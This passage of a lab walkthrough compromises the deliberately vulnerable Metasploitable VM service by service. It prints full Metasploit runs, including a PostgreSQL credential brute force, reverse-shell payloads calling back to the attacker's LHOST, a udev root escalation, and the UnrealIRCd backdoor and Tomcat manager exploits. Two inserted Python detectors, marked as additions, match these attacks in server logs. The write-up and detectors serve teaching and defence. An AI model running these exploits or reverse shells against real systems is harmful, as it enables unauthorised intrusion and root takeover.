Port 5432 postgresql

Since I already saw that the MySQL database wasn’t password protected, I will try a brute-force auxiliary module to see if I can get into this one.

PostgreSQL Login Utility

This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                             Required  Description
   ----              ---------------                                                             --------  -----------
   BLANK_PASSWORDS   false                                                                       no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                           yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                   yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                       no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                       no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                       no        Add all users in the current database to the list
   PASSWORD                                                                                      no        A specific password to authenticate with
   PASS_FILE         /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   RETURN_ROWSET     true                                                                        no        Set to true to see query result sets
   RHOSTS                                                                                        yes       The target address range or CIDR identifier
   RPORT             5432                                                                        yes       The target port
   STOP_ON_SUCCESS   false                                                                       yes       Stop guessing when a credential works for a host
   THREADS           1                                                                           yes       The number of concurrent threads
   USERNAME          postgres                                                                    no        A specific username to authenticate as
   USERPASS_FILE     /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt  no        File containing (space-seperated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                       no        Try the username as the password for all users
   USER_FILE         /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                        yes       Whether to print output for all attempts


msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > run

[*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] 192.168.127.154:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So, like mysql earlier, this database can be logged into. I also searched through Metasploit’s available exploits and stumbled upon one that can take the exploitation further:

PostgreSQL for Linux Payload Execution

On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF shared libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object’s constructor, it does not need to conform to specific Postgres API versions.

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST                      yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(postgres_payload) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] 192.168.127.154:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.127.154
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2014-06-06 22:49:17 +0300
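
Both PostgreSQL steps above leave traces in the server log: the brute force shows up as repeated authentication failures followed by an authorized connection, and the payload module's upload and UDF creation show up as a write to pg_largeobject and a CREATE FUNCTION pointing at a library under /tmp. The detector below is an added example, not part of the original post; it assumes log_connections=on and log_statement='all', and runs over constructed log lines modelled on the two module runs (the /tmp/uVhDfWDg.so path is reused from the output above).

```python
import re
from collections import Counter

# Constructed PostgreSQL server log (log_connections=on, log_statement='all'),
# modelled on the two module runs above; not taken from the original post's VM.
SAMPLE_LOG = """\
2014-06-06 22:40:01 EEST [4121] FATAL:  password authentication failed for user "postgres"
2014-06-06 22:40:01 EEST [4122] FATAL:  password authentication failed for user "postgres"
2014-06-06 22:40:02 EEST [4123] FATAL:  password authentication failed for user "postgres"
2014-06-06 22:40:02 EEST [4124] FATAL:  password authentication failed for user "scott"
2014-06-06 22:40:03 EEST [4125] LOG:  connection authorized: user=postgres database=template1
2014-06-06 22:49:15 EEST [4130] LOG:  statement: UPDATE pg_largeobject SET data = '<elf bytes>' WHERE loid = 16385
2014-06-06 22:49:16 EEST [4130] LOG:  statement: CREATE OR REPLACE FUNCTION pg_temp.xqz() RETURNS void AS '/tmp/uVhDfWDg.so', 'xqz' LANGUAGE 'C' STRICT
2014-06-06 23:10:00 EEST [4140] LOG:  statement: SELECT count(*) FROM pg_class
"""

AUTH_FAIL = re.compile(r'FATAL:\s+password authentication failed for user "([^"]+)"')
AUTHORIZED = re.compile(r"connection authorized: user=(\S+)")
LARGEOBJECT_WRITE = re.compile(r"statement:\s+UPDATE\s+pg_largeobject\b", re.I)
# CREATE FUNCTION ... AS '<library path>' ... LANGUAGE C  (or LANGUAGE 'C')
C_FUNCTION = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*?\bAS\s+'([^']+)'.*?\bLANGUAGE\s+'?C'?(?!\w)", re.I)
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable library locations


def analyse(log: str, fail_threshold: int = 3) -> dict:
    """Return per-user failure counts and a list of findings for the given log text."""
    failures = Counter()
    findings = []
    for line in log.splitlines():
        m = AUTH_FAIL.search(line)
        if m:
            failures[m.group(1)] += 1
            continue
        m = AUTHORIZED.search(line)
        if m:  # a success right after a run of failures is the brute-force signature
            if failures[m.group(1)] >= fail_threshold:
                findings.append(f"login for {m.group(1)} after {failures[m.group(1)]} failures")
            continue
        if LARGEOBJECT_WRITE.search(line):
            findings.append("direct write to pg_largeobject")  # binary upload path
            continue
        m = C_FUNCTION.search(line)
        if m and m.group(1).startswith(WRITABLE_DIRS):
            findings.append(f"C function loaded from {m.group(1)}")
    for user, n in failures.items():  # report brute force even when it never succeeded
        if n >= fail_threshold:
            findings.append(f"{n} failed password attempts for {user}")
    return {"failures": dict(failures), "findings": findings}
```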

From here we again have to elevate our privileges. I will exploit the same vulnerability with the udev exploit, but this time from inside Metasploit:

meterpreter > background
[*] Backgrounding session 1...
msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(udev_netlink) > set SESSION 1
SESSION => 1
msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2770
[+] Found netlink pid: 2769
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
[*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR
[*] chmod'ing and running it...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2014-06-06 23:03:13 +0300

whoami
root

So, the same exploit that I manually used earlier was very easy and quick in Metasploit. Onwards!

Port 5900 vnc

The Nessus scan reported that the server is using the password ‘password’. So I will use vncviewer to connect to it:

vncviewer 192.168.127.154
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0


And we have another root shell.

Port 6667 irc

An exploit is available for this:

UnrealIRCD 3.2.8.1 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse 
payload => cmd/unix/reverse
msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.127.154:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qcHh6jsH8rZghWdi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qcHh6jsH8rZghWdi\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2014-06-06 23:31:44 +0300

whoami
root

Port 8180 tomcat

First, let’s see what information we can get using the Tomcat Administration Tool Default Access module:

msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        Use a proxy chain
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        8180             yes       The target port
   THREADS      1                yes       The number of concurrent threads
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(tomcat_administration) > run

[*] http://192.168.127.154:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With credentials in hand, now we can use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit:

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set payload  java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.127.159:8888 
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war ...
[*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp...
[*] Undeploying RuoE02Uo7DeSsaVp7nmb79cq ...
[*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2014-06-06 23:51:01 +0300

whoami
tomcat55

We can elevate our privileges using the udev exploit from earlier, so I won’t go over it again.
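
The deploy, execute and undeploy steps the module printed above map one-to-one onto Tomcat access log entries, which is what a defender has to work with after the WAR has already been removed. The following detector is an added example, not code from the original post: it assumes the AccessLogValve "common" log pattern and runs over constructed log lines modelled on the sequence above (the context and JSP names are reused from the module output).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Tomcat access log (AccessLogValve "common" pattern) modelled on the
# deploy / execute / undeploy sequence the module printed above; not real captures.
SAMPLE_ACCESS_LOG = """\
192.168.127.159 - tomcat [06/Jun/2014:23:50:57 +0300] "GET /admin/ HTTP/1.1" 200 3142
192.168.127.159 - tomcat [06/Jun/2014:23:50:58 +0300] "PUT /manager/deploy?path=/RuoE02Uo7DeSsaVp7nmb79cq HTTP/1.1" 200 71
192.168.127.159 - - [06/Jun/2014:23:50:59 +0300] "GET /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp HTTP/1.1" 200 0
192.168.127.159 - tomcat [06/Jun/2014:23:51:02 +0300] "GET /manager/undeploy?path=/RuoE02Uo7DeSsaVp7nmb79cq HTTP/1.1" 200 71
10.0.0.7 - - [06/Jun/2014:23:52:10 +0300] "GET /tomcat-docs/index.html HTTP/1.1" 200 6120
10.0.0.9 - admin [06/Jun/2014:23:53:00 +0300] "POST /manager/html/upload HTTP/1.1" 403 1282
"""

LINE = re.compile(r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def parse_access_log(text: str):
    """Yield one dict per parseable request line (unparseable lines are skipped)."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            yield rec


def manager_activity(text: str, manager_path: str = "/manager"):
    """Return (events, contexts): every manager deploy/undeploy/upload request, and
    for each successful PUT deploy the JSPs run under it and whether it was undeployed."""
    events, contexts = [], {}
    for r in parse_access_log(text):
        url = urlsplit(r["target"])
        ctx = parse_qs(url.query).get("path", [""])[0]  # ?path=/context on deploy calls
        if url.path == f"{manager_path}/deploy" and r["method"] == "PUT":
            events.append(("deploy", r["host"], r["user"], ctx, r["status"]))
            if r["status"] == 200 and ctx:
                contexts[ctx] = {"deployed_by": r["host"], "executed": [], "undeployed": False}
        elif url.path == f"{manager_path}/undeploy":
            events.append(("undeploy", r["host"], r["user"], ctx, r["status"]))
            if ctx in contexts and r["status"] == 200:
                contexts[ctx]["undeployed"] = True
        elif url.path.startswith(f"{manager_path}/html/upload"):
            events.append(("upload", r["host"], r["user"], "", r["status"]))
        else:  # a JSP request into a freshly deployed context is the payload being run
            for deployed, info in contexts.items():
                if url.path.startswith(deployed + "/") and url.path.endswith(".jsp"):
                    info["executed"].append(url.path)
    return events, contexts
```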

Port 8787 drb

First I wanted to know what this drb is, since I wasn’t familiar with it.

Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes. (Wikipedia)

Then I searched in Metasploit for an exploit, and luckily, I got a hit:

Distributed Ruby Send instance_eval/syscall Code Execution

This module exploits remote code execution vulnerabilities in dRuby.

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
URI => druby://192.168.127.154:8787

msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[-] Exploit failed: Errno::EINVAL Invalid argument
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7Kx3j4QvoI7LOU5z;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7Kx3j4QvoI7LOU5z\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2014-06-08 16:51:56 +0300

whoami
root

Another port, another shell!

This turned out to be a very lengthy post. There were some ports I couldn’t find an exploit for, so I can’t determine whether the underlying services were exploitable or not. Overall, owning Metasploitable in multiple ways and documenting it was the goal of this post.

Today’s cookie:

You will be a winner today. Pick a fight with a four-year-old.
